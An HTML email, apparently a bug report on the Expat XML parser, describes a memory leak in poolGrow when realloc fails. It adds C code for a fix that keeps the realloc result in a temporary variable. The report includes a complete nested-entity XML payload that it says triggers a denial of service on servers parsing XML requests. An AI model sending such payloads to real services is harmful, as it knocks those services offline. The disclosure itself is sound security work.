<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML><HEAD>
<META http-equiv=Content-Type content="text/html; charset=us-ascii">
<META content="MSHTML 6.00.2900.5880" name=GENERATOR></HEAD>
<BODY>
<DIV>
<DIV><SPAN class=790075923-23022010><FONT face=Arial size=2>poolGrow in
xml.parse.cpp has the following block of code:</FONT></SPAN></DIV>
<DIV><SPAN class=790075923-23022010><FONT face=Arial
size=2></FONT></SPAN> </DIV>
<DIV><SPAN class=790075923-23022010>
<DIV><PRE>if (pool->blocks && pool->start == pool->blocks->s) {
  int blockSize = (int)(pool->end - pool->start)*2;
  pool->blocks = (BLOCK *)
    pool->mem->realloc_fcn(pool->blocks,
                           (offsetof(BLOCK, s)
                            + blockSize * sizeof(XML_Char)));
  if (pool->blocks == NULL)
    return XML_FALSE;
  pool->blocks->size = blockSize;
  pool->ptr = pool->blocks->s + (pool->ptr - pool->start);
  pool->start = pool->blocks->s;
  pool->end = pool->start + blockSize;
}</PRE></DIV>
<DIV><SPAN class=790075923-23022010><FONT face=Arial size=2>It looks like this
will cause a memory leak if realloc_fcn returns NULL because pool->blocks
will be overwritten but the old memory area to which it pointed won't be
freed.</FONT></SPAN></DIV>
<DIV><SPAN class=790075923-23022010><FONT face=Arial
size=2></FONT></SPAN> </DIV>
<DIV><SPAN class=790075923-23022010><FONT face=Arial size=2>The
other places where reallocation is done in this file (via the REALLOC
macro) don't have this bug because they correctly store the result in a
temporary variable.</FONT></SPAN></DIV>
<DIV><SPAN class=790075923-23022010><FONT face=Arial
size=2></FONT></SPAN> </DIV>
<DIV><SPAN class=790075923-23022010><SPAN class=184213719-24022010><FONT
face=Arial size=2>This bug allows a serious DoS attack on a server that accepts
XML-based requests if a request is seen of the following
form:</FONT></SPAN></SPAN></DIV>
<DIV><PRE>&lt;!DOCTYPE foo [
&lt;!ENTITY a "1234567890" >
&lt;!ENTITY b "&amp;a;&amp;a;&amp;a;&amp;a;&amp;a;&amp;a;&amp;a;&amp;a;" >
&lt;!ENTITY c "&amp;b;&amp;b;&amp;b;&amp;b;&amp;b;&amp;b;&amp;b;&amp;b;" >
&lt;!ENTITY d "&amp;c;&amp;c;&amp;c;&amp;c;&amp;c;&amp;c;&amp;c;&amp;c;" >
&lt;!ENTITY e "&amp;d;&amp;d;&amp;d;&amp;d;&amp;d;&amp;d;&amp;d;&amp;d;" >
&lt;!ENTITY f "&amp;e;&amp;e;&amp;e;&amp;e;&amp;e;&amp;e;&amp;e;&amp;e;" >
&lt;!ENTITY g "&amp;f;&amp;f;&amp;f;&amp;f;&amp;f;&amp;f;&amp;f;&amp;f;" >
&lt;!ENTITY h "&amp;g;&amp;g;&amp;g;&amp;g;&amp;g;&amp;g;&amp;g;&amp;g;" >
&lt;!ENTITY i "&amp;h;&amp;h;&amp;h;&amp;h;&amp;h;&amp;h;&amp;h;&amp;h;" >
&lt;!ENTITY j "&amp;i;&amp;i;&amp;i;&amp;i;&amp;i;&amp;i;&amp;i;&amp;i;" >
&lt;!ENTITY k "&amp;j;&amp;j;&amp;j;&amp;j;&amp;j;&amp;j;&amp;j;&amp;j;" >
&lt;!ENTITY l "&amp;k;&amp;k;&amp;k;&amp;k;&amp;k;&amp;k;&amp;k;&amp;k;" >
&lt;!ENTITY m "&amp;l;&amp;l;&amp;l;&amp;l;&amp;l;&amp;l;&amp;l;&amp;l;" >
&lt;!ENTITY n "&amp;m;&amp;m;&amp;m;&amp;m;&amp;m;&amp;m;&amp;m;&amp;m;" >
]>
&lt;foo bar="&amp;n;"/></PRE></DIV>
<DIV><SPAN class=790075923-23022010><SPAN class=184213719-24022010><FONT
face=Arial size=2>When the attribute is expanded, the realloc (assuming that it
bounds the size of the request) will fail, leaking the buffer from before the
realloc.</FONT></SPAN></SPAN></DIV>
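<DIV><FONT face=Arial size=2>Added example (C, not part of this report and not Expat's own code): a cut-down model of the poolGrow realloc step that keeps the realloc result in a temporary, as the REALLOC macro mentioned above does, driven by a constructed allocator that refuses requests above a fixed cap so the failed-grow case from the attribute expansion can be checked. The BLOCK and STRING_POOL layout, bounded_realloc, REALLOC_CAP, pool_init and demo_no_leak are assumptions of this example.</FONT></DIV>

```c
/* Added example, not Expat's code: poolGrow's realloc step with the result
 * held in a temporary, so a refused realloc leaves pool->blocks intact.
 * The BLOCK/STRING_POOL layout and REALLOC_CAP are assumptions. */
#include <stddef.h>
#include <stdlib.h>

typedef char XML_Char;
typedef struct { int size; XML_Char s[1]; } BLOCK;
typedef struct {
  void *(*realloc_fcn)(void *, size_t);  /* stands in for pool->mem->realloc_fcn */
  BLOCK *blocks;
  XML_Char *ptr, *start, *end;
} STRING_POOL;

/* Constructed allocator: refuses requests above REALLOC_CAP bytes, modelling
 * the bounded realloc the report assumes. */
#define REALLOC_CAP 64
static void *bounded_realloc(void *p, size_t n) {
  return n > REALLOC_CAP ? NULL : realloc(p, n);
}

static int pool_init(STRING_POOL *pool, int blockSize) {
  pool->realloc_fcn = bounded_realloc;
  pool->blocks = malloc(offsetof(BLOCK, s) + blockSize * sizeof(XML_Char));
  if (pool->blocks == NULL) return 0;
  pool->blocks->size = blockSize;
  pool->start = pool->ptr = pool->blocks->s;
  pool->end = pool->start + blockSize;
  return 1;
}

/* Fixed grow: commit to pool->blocks only after realloc succeeded. */
static int pool_grow_fixed(STRING_POOL *pool) {
  int blockSize = (int)(pool->end - pool->start) * 2;
  BLOCK *temp = (BLOCK *)pool->realloc_fcn(
      pool->blocks, offsetof(BLOCK, s) + blockSize * sizeof(XML_Char));
  if (temp == NULL) return 0;    /* pool->blocks still owns the old block */
  pool->blocks = temp;
  pool->blocks->size = blockSize;
  pool->ptr = pool->blocks->s + (pool->ptr - pool->start);
  pool->start = pool->blocks->s;
  pool->end = pool->start + blockSize;
  return 1;
}

/* Grows a 16-char pool until the allocator refuses; returns the size of the
 * block still owned after the failure (0 if it was lost) and frees it. */
int demo_no_leak(void) {
  STRING_POOL pool; int kept;
  if (!pool_init(&pool, 16)) return 0;
  while (pool_grow_fixed(&pool)) ;  /* 16 -> 32 succeeds, 64 is refused */
  kept = pool.blocks ? pool.blocks->size : 0;
  free(pool.blocks);               /* still reachable, so it can be released */
  return kept;
}
```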
<DIV><SPAN class=790075923-23022010><SPAN class=184213719-24022010><FONT
face=Arial size=2></FONT></SPAN></SPAN> </DIV>
<DIV><SPAN class=790075923-23022010><SPAN class=184213719-24022010><FONT
face=Arial size=2>This bug was also present in older versions (e.g.
1.95.8).</FONT></SPAN></SPAN></DIV></SPAN></DIV></DIV></BODY></HTML>